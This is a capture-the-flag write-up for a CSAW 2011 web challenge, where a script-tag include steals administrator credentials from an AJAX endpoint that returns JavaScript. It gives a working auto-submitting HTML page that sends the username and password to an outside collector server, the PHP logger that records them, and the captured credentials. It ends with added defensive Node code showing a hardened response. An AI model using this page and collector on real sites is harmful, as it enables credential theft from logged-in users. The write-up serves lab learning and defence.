
CSAW 2011 CrackJack Web6 Write-up

In this challenge, we need to get the administrator credentials on the site of someone who loves cats, AJAX and getting contact emails.

A robot will visit any link you post in the contact form, and this robot is logged in to the site’s administrator account at the same time.

The key vulnerability in this application is that the AJAX calls aren’t returning JSON; they are returning JavaScript expressions. This makes it much easier to exploit because we don’t need to do any cross-domain calls.

One particularly interesting page is the self.php page, which gives the logged-in user some information about their account: username and password.

The content of this page is built using … AJAX calls that fetch JavaScript expressions containing an array with the username and password. You see where we are going.

One hint given by the CTF team is that the internal IP of the web server, as seen from the administrator’s point of view, is 192.168.4.4

So normally, the URL is http://csawctf.poly.edu:40004/challenge2/json/getcurrent.js

From the administrator’s point of view, it will be http://192.168.4.4/challenge2/json/getcurrent.js

So we need:

  • a way to fetch the JavaScript from this URL
  • a way to send it back to a server we control

We did something very simple following a bright idea of our team-mate fser: using a script tag to fetch the remote JavaScript expression. Then we use some JavaScript to update a form’s hidden fields with the username and password, and we submit the form to our remote server. That’s it.

Code for the page the robot (administrator of the site) will visit:

<script type="text/javascript" src="http://192.168.4.4/challenge2/json/getcurrent.js"></script>
<script type="text/javascript">
function getCurrent() {
document.forms[0].username.value = current.username;
document.forms[0].password.value = current.password;
document.forms[0].submit();
}
</script>

<body onload="getCurrent()">
<form id="myform" action="http://1.2.3.4/stealth.php" method="POST">
<input type="hidden" name="username" value="defaultusername"/>
<input type="hidden" name="password" value="defaultpassword"/>
</form>
</body>

Code for the data stealer targeted by our auto-submitted form (nothing special):

<?php
// Append whatever the auto-submitted form sends to a log file.
$f = fopen('log.txt', 'a+');
fwrite($f, serialize($_GET) . PHP_EOL);
fwrite($f, serialize($_POST) . PHP_EOL);
fclose($f);

When the robot hits our page, we get the result in our log file:

a:0:{}
a:2:{s:8:"username";s:13:"administrator";s:8:"password";s:40:"2d8a579d4d4bbd98399f47df0d6c8fd0be22e3a8";}

Now we log on to the website with this username and password and we get the key on the front page. We are done.
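
The root cause above, seen from the defender's side, as an added example (not code from the original write-up or the challenge): a response that is a JavaScript expression is readable by any page that includes it with a script tag, while strict JSON is not. The `var current = ...` response shape, the `hardenedResponse` handler and its header checks are assumptions made for illustration; Node's `vm` module stands in for the including page.

```javascript
const vm = require('vm');

// Constructed sample account; field names follow the write-up.
const account = { username: 'alice', password: 'constructed-sample-secret' };

// Vulnerable shape (assumed): the endpoint answers with a script defining `current`.
function vulnerableBody(acct) {
  return 'var current = ' + JSON.stringify(acct) + ';';
}

// Hardened handler (hypothetical): strict JSON, no secret fields, and a
// refusal of any request that a <script src> include would generate.
function hardenedResponse(reqHeaders, acct) {
  const h = {};
  for (const [k, v] of Object.entries(reqHeaders)) h[k.toLowerCase()] = v;
  // Browsers send Sec-Fetch-Dest: script for <script src>, and a script tag
  // cannot add custom headers, so the site's own XHR is told apart by one.
  if (h['sec-fetch-dest'] === 'script' || h['x-requested-with'] !== 'XMLHttpRequest') {
    return { status: 403, headers: {}, body: '' };
  }
  return {
    status: 200,
    headers: {
      'Content-Type': 'application/json; charset=utf-8',
      'X-Content-Type-Options': 'nosniff', // browser refuses to run it as script
    },
    body: JSON.stringify({ username: acct.username }), // password stays server-side
  };
}

// Model a third-party page loading `body` through a script tag: run it in a
// fresh global and report which globals that page could then read.
function globalsAfterScriptInclude(body) {
  const sandbox = {};
  try {
    vm.runInNewContext(body, sandbox);
  } catch (e) {
    return { error: e.name, globals: {} };
  }
  return { error: null, globals: sandbox };
}

const leaked = globalsAfterScriptInclude(vulnerableBody(account));
const ownXhr = hardenedResponse({ 'X-Requested-With': 'XMLHttpRequest' }, account);
const safe = globalsAfterScriptInclude(ownXhr.body);
console.log('vulnerable include exposes:', Object.keys(leaked.globals));
console.log('hardened body as script:', safe.error, Object.keys(safe.globals));
```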
